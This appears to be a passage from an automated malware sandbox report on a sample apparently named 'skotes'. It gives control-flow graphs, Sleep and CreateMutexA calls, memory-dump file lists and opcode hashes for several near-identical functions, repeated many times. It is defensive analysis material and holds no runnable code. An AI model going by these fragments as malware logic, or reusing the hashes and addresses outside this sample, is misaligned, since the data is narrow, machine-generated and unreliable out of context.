                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531156719.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531178188.0000000000E3F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531213847.0000000000E44000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531248108.0000000000E4C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531275107.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531302734.0000000000E4E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531337180.0000000000E51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531374657.0000000000E61000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531406002.0000000000E62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531442277.0000000000E6B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000E6C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000EA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531590029.0000000000ECE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531620598.0000000000ECF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531652688.0000000000ED7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531680213.0000000000ED9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531709660.0000000000EE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531734516.0000000000EE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: 741a5d12e4345f3b152cba890ffffcff5ebca83525da57393b2cbbf6cc6676e4
                                                                                                                                                                                                                              • Instruction ID: 3ee2a39b63123d5cb1d8995cc332034ad3f74810d0bc06ab0989aaa74c7725e2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 741a5d12e4345f3b152cba890ffffcff5ebca83525da57393b2cbbf6cc6676e4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 643126316041409FEB08AB7DDC8976DF7E2EBC6314F24829AE014A73D1E77A99808756
                                                                                                                                                                                                                              Function 00BDA418 Relevance: 3.1, APIs: 2, Instructions: 133sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 124 bda418-bda438 128 bda43a-bda446 124->128 129 bda466-bda482 124->129 132 bda45c-bda463 call bed663 128->132 133 bda448-bda456 128->133 130 bda484-bda490 129->130 131 bda4b0-bda4cf 129->131 134 bda4a6-bda4ad call bed663 130->134 135 bda492-bda4a0 130->135 136 bda4fd-bda916 call be80c0 131->136 137 bda4d1-bda4dd 131->137 132->129 133->132 138 bda93f-bda949 call c06c6a * 2 133->138 134->131 135->134 135->138 141 bda4df-bda4ed 137->141 142 bda4f3-bda4fa call bed663 137->142 155 bda94e 138->155 156 bda949 call c06c6a 138->156 141->138 141->142 142->136 157 bda953-bda994 Sleep CreateMutexA 155->157 158 bda94e call c06c6a 155->158 156->155 160 bda9a7-bda9a8 157->160 161 bda996-bda998 157->161 158->157 161->160 162 bda99a-bda9a5 161->162 162->160
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1522880580.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522706879.0000000000BD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522880580.0000000000C32000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523628636.0000000000C39000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523663771.0000000000C3B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1524170738.0000000000C47000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525599737.0000000000DA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525653205.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526635603.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526668570.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DC6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526945746.0000000000DD4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527000689.0000000000DD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527088914.0000000000DD8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527135386.0000000000DDA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527192693.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1529104338.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531043199.0000000000E34000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531080223.0000000000E36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531112922.0000000000E37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531156719.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531178188.0000000000E3F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531213847.0000000000E44000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531248108.0000000000E4C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531275107.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531302734.0000000000E4E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531337180.0000000000E51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531374657.0000000000E61000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531406002.0000000000E62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531442277.0000000000E6B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000E6C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000EA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531590029.0000000000ECE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531620598.0000000000ECF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531652688.0000000000ED7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531680213.0000000000ED9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531709660.0000000000EE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531734516.0000000000EE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: f20e64d5cb3409db29d41a7a6ec3a6d216d28611f863e9dc5c57ca570597e91f
                                                                                                                                                                                                                              • Instruction ID: 7eab031f68a1eeec9934ec74ff38f9952e76c9be5c6d321709d740ef10803363
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f20e64d5cb3409db29d41a7a6ec3a6d216d28611f863e9dc5c57ca570597e91f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4316C316041409BFB08AB7CDCD976DF7E2DFC5314F20829AE014973D5E7BA59808756
                                                                                                                                                                                                                              Function 00BDA54D Relevance: 3.1, APIs: 2, Instructions: 132sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 164 bda54d-bda56d 168 bda56f-bda57b 164->168 169 bda59b-bda5b7 164->169 172 bda57d-bda58b 168->172 173 bda591-bda598 call bed663 168->173 170 bda5b9-bda5c5 169->170 171 bda5e5-bda604 169->171 174 bda5db-bda5e2 call bed663 170->174 175 bda5c7-bda5d5 170->175 176 bda606-bda612 171->176 177 bda632-bda916 call be80c0 171->177 172->173 178 bda944-bda949 call c06c6a 172->178 173->169 174->171 175->174 175->178 183 bda628-bda62f call bed663 176->183 184 bda614-bda622 176->184 190 bda94e 178->190 191 bda949 call c06c6a 178->191 183->177 184->178 184->183 195 bda953-bda994 Sleep CreateMutexA 190->195 196 bda94e call c06c6a 190->196 191->190 198 bda9a7-bda9a8 195->198 199 bda996-bda998 195->199 196->195 199->198 200 bda99a-bda9a5 199->200 200->198
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1522880580.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522706879.0000000000BD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522880580.0000000000C32000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523628636.0000000000C39000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523663771.0000000000C3B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1524170738.0000000000C47000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525599737.0000000000DA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525653205.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526635603.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526668570.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DC6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526945746.0000000000DD4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527000689.0000000000DD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527088914.0000000000DD8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527135386.0000000000DDA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527192693.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1529104338.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531043199.0000000000E34000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531080223.0000000000E36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531112922.0000000000E37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531156719.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531178188.0000000000E3F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531213847.0000000000E44000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531248108.0000000000E4C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531275107.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531302734.0000000000E4E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531337180.0000000000E51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531374657.0000000000E61000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531406002.0000000000E62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531442277.0000000000E6B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000E6C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000EA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531590029.0000000000ECE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531620598.0000000000ECF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531652688.0000000000ED7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531680213.0000000000ED9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531709660.0000000000EE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531734516.0000000000EE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: c78a1f9ca67ca22e8b8ac80018cde223d24df953f66cb69bc9a2370490e2c6a0
                                                                                                                                                                                                                              • Instruction ID: ef234d0cab9d7ab66880e6d89258ecf07539de6257ebc002cb6420c033afe35d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c78a1f9ca67ca22e8b8ac80018cde223d24df953f66cb69bc9a2370490e2c6a0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A316A316041408BFB08EB78DCD976DF7E6EBC5318F24829AE414973D1E77A99808756
                                                                                                                                                                                                                              Function 00BDA682 Relevance: 3.1, APIs: 2, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 202 bda682-bda6a2 206 bda6a4-bda6b0 202->206 207 bda6d0-bda6ec 202->207 208 bda6c6-bda6cd call bed663 206->208 209 bda6b2-bda6c0 206->209 210 bda6ee-bda6fa 207->210 211 bda71a-bda739 207->211 208->207 209->208 212 bda949 209->212 214 bda6fc-bda70a 210->214 215 bda710-bda717 call bed663 210->215 216 bda73b-bda747 211->216 217 bda767-bda916 call be80c0 211->217 218 bda94e 212->218 219 bda949 call c06c6a 212->219 214->212 214->215 215->211 223 bda75d-bda764 call bed663 216->223 224 bda749-bda757 216->224 228 bda953-bda994 Sleep CreateMutexA 218->228 229 bda94e call c06c6a 218->229 219->218 223->217 224->212 224->223 234 bda9a7-bda9a8 228->234 235 bda996-bda998 228->235 229->228 235->234 236 bda99a-bda9a5 235->236 236->234
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1522880580.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522706879.0000000000BD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522880580.0000000000C32000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523628636.0000000000C39000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523663771.0000000000C3B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1524170738.0000000000C47000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525599737.0000000000DA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525653205.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526635603.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526668570.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DC6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526945746.0000000000DD4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527000689.0000000000DD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527088914.0000000000DD8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527135386.0000000000DDA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527192693.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1529104338.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531043199.0000000000E34000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531080223.0000000000E36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531112922.0000000000E37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531156719.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531178188.0000000000E3F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531213847.0000000000E44000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531248108.0000000000E4C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531275107.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531302734.0000000000E4E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531337180.0000000000E51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531374657.0000000000E61000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531406002.0000000000E62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531442277.0000000000E6B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000E6C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531487669.0000000000EA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531590029.0000000000ECE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531620598.0000000000ECF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531652688.0000000000ED7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531680213.0000000000ED9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531709660.0000000000EE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1531734516.0000000000EE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                              • Opcode ID: b8aa14118c3d5232ed57fe2d2ffd564728337245b76c2d5c3376dac82ba67ae0
                                                                                                                                                                                                                              • Instruction ID: dffd15aacf0bc400d2b67b453619754b9adae94b5e626132468544a00050a208
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8aa14118c3d5232ed57fe2d2ffd564728337245b76c2d5c3376dac82ba67ae0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD3159316041408BEB08DB7CDCD976DF7F2DBC5314F24869AE014973E1E7BA99808756
                                                                                                                                                                                                                              Function 00BD9ADC Relevance: 3.1, APIs: 2, Instructions: 107sleepsynchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 238 bd9adc-bd9ae8 239 bd9afe-bd9b27 call bed663 238->239 240 bd9aea-bd9af8 238->240 247 bd9b29-bd9b35 239->247 248 bd9b55-bd9b57 239->248 240->239 241 bda917 240->241 244 bda953-bda994 Sleep CreateMutexA 241->244 245 bda917 call c06c6a 241->245 254 bda9a7-bda9a8 244->254 255 bda996-bda998 244->255 245->244 250 bd9b4b-bd9b52 call bed663 247->250 251 bd9b37-bd9b45 247->251 252 bd9b59-bda916 call be80c0 248->252 253 bd9b65-bd9d91 call be7a00 call bd5c10 call bd8b30 call be8220 call be7a00 call bd5c10 call bd8b30 call be8220 248->253 250->248 251->241 251->250 255->254 256 bda99a-bda9a5 255->256 256->254
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1522880580.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522706879.0000000000BD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1522880580.0000000000C32000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523628636.0000000000C39000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1523663771.0000000000C3B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1524170738.0000000000C47000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525599737.0000000000DA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1525653205.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526635603.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526668570.0000000000DC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DC6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526710461.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1526945746.0000000000DD4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527000689.0000000000DD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527088914.0000000000DD8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527135386.0000000000DDA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1527192693.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1529104338.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
